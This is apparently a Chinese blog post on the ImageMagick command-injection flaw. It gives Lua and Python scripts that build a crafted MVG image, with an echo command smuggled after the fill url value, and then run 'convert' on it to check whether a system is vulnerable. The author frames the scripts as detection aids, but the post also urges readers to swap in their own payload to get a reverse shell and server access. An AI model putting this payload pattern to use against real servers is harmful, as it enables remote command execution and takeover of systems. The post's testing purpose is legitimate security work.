ImageMagick这个漏洞昨天晚上就出来了,今天才有时间研究一下,今天自己也测试了一下
效果图:
=======================
用lua写了一个检测脚本
1 print ("Checking...") 2 file=io.open("exp.jpg","w") 3 --file:write("s") 4 file:write("push graphic-context viewbox 0 0 640 480 ") 5 file:write("fill 'url(https://example.com/image.jpg") 6 file:write('"|echo "success!!!)') 7 file:write("' ") 8 file:write("pop graphic-context") 9 file:close() 10 cmd=io.popen("convert exp.jpg test.png") 11 result=cmd:read("*all") 12 print(result)
python版本:
1 import os 2 3 file = open("./x","w") 4 file.write("push graphic-context ") 5 file.write("viewbox 0 0 640 480 ") 6 file.write("fill 'url(https://example.com/image.jpg"|echo "dangerous!)' ") 7 file.write("pop graphic-context ") 8 file.close() 9 10 res = os.system("convert ./x ./y 2>/dev/null") 11 if os.path.exists("x"): 12 os.remove("x") 13 if os.path.exists("y"): 14 os.remove("y")
如果存在返回
当然playload自己改吧,可以直接反弹个shell回来,直接拿到服务器权限
附上一篇分析文章:
http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0